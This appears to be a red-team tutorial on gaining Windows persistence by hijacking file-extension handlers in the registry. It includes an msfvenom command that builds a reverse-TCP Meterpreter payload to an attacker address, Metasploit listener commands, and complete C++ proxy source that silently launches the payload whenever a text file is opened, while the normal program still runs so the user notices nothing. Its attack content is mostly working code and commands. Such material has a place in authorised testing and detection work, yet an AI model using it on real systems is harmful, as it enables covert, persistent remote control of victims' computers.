In Windows environments every file extensions are associated with a default program. This allows Windows to identify which program needs to be used in order to open a specific file. The associations of extensions with programs is handled through the registry. However, it is possible to hijack registry keys which handle the default program for specific extensions during a red team assessment in order to achieve persistence.

The two registry locations which define the extension handlers are the following and are classified as: Global and Local.

HKEY_CLASSES_ROOT // Global
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts // Local

When a user attempts to open a file the operating system performs a registry check in the Local (HKEY_USERS) in order to find which program is specified to open the file with that extension. If there is no registry key associated the check is performed on the Global registry tree (HKEY_CLASSES_ROOT). Depending on the level of privileges (Administrator or Standard User) these registry locations can be hijacked in order to execute an arbitrary payload by using as a trigger the extension handler.

hasherezade discussed on her blog the technique of hijacking extension handlers as a malware persistence method and released the code for two binaries that can perform the hijacking. The “ExtensionHijacker.exe” is used to modify the registry key entries as per the example below:

The “ProxyApp” will handle the extensions, and will create a new process with an arbitrary payload. The default application will also run as normal so the user will not experience any difference. Metasploit Framework can be used to generate the required payload that will be used to achieve persistence.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.254.147 LPORT=4444 -f exe > pentestlab.exe

The Metasploit module “multi/handler” can be configured in order to capture the session when the code is executed on the target system.

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.254.147
set LPORT 4444
exploit

The following code has been developed by hasherezade as a proof of concept for the “ProxyApp” application. A new process “pentestlab.exe” will be created in the security context of the calling process (ProxyApp.exe). Also the payload needs to be dropped into disk. This can give the opportunity to the blue team to detect this activity.

#include <stdio.h>
#include <Windows.h>
#include <psapi.h>

#include <string>

HANDLE create_new_process(IN const char* path, IN const char* cmd)
{
    STARTUPINFOA si;
    memset(&si, 0, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    si.wShowWindow = 0;

    PROCESS_INFORMATION pi;
    memset(&pi, 0, sizeof(PROCESS_INFORMATION));
    
    if (!CreateProcessA(
        path,
        (LPSTR) cmd,
        NULL, //lpProcessAttributes
        NULL, //lpThreadAttributes
        FALSE, //bInheritHandles
        DETACHED_PROCESS  | CREATE_NO_WINDOW,
        NULL, //lpEnvironment 
        NULL, //lpCurrentDirectory
        &si, //lpStartupInfo
        &pi //lpProcessInformation
    ))
    {
        return NULL;
    }
    return pi.hProcess;
}

void deploy_payload()
{
    char full_path[MAX_PATH] = { 0 };
    char calc_path[] = "%SystemRoot%\\system32\\pentestlab.exe";
    ExpandEnvironmentStrings(calc_path, full_path, MAX_PATH);
    create_new_process(full_path, NULL);
}

int main(int argc, char *argv[])
{
    std::string merged_args;
    if (argc >= 2) {
        for (int i = 1; i < argc; i++) {
            merged_args += std::string(argv[i]) + " ";
        }
        create_new_process(NULL, merged_args.c_str());
    }

    deploy_payload();
    return 0;
}

The “ExtensionHijacker” executable is mainly used to automate the activity by hijacking all the extensions on the registry and dropping the “ProxyApp.exe” to the following directory:

C:\ProgramData\ProxyApp.exe

Executing the file from the command prompt will start the hijacking of the extensions handlers.

However this process can be performed manually to only one extension by using only the “ProxyApp” application and the registry key that handles the default program of the extension. For example the following registry key handles the program that opens text files (notepad.exe).

HKEY_CLASSES_ROOT\txtfile\shell\open\command

The next time that a text file will open on the system the payload will executed since the extension has been hijacked with the “ProxyApp” executable.

A Meterpreter session will open on the target host which will prove that the hijacked was successful.

Text files can be created and opened by the user multiple times. Configuring the Metasploit listener to run as a background job will allow to capture multiple Meterpreter sessions.

set ExitOnSession false
exploit -j

Opening text files multiple times will trigger the execution of the payload and multiple Meterpreter sessions will get captured by the listener.

References

• https://attack.mitre.org/techniques/T1042/
• https://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/
• https://github.com/hasherezade/persistence_demos
• https://oalabs.openanalysis.net/2015/06/04/malware-persistence-hkey_current_user-shell-extension-handlers/
• https://github.com/herrcore/LocalShellExtParse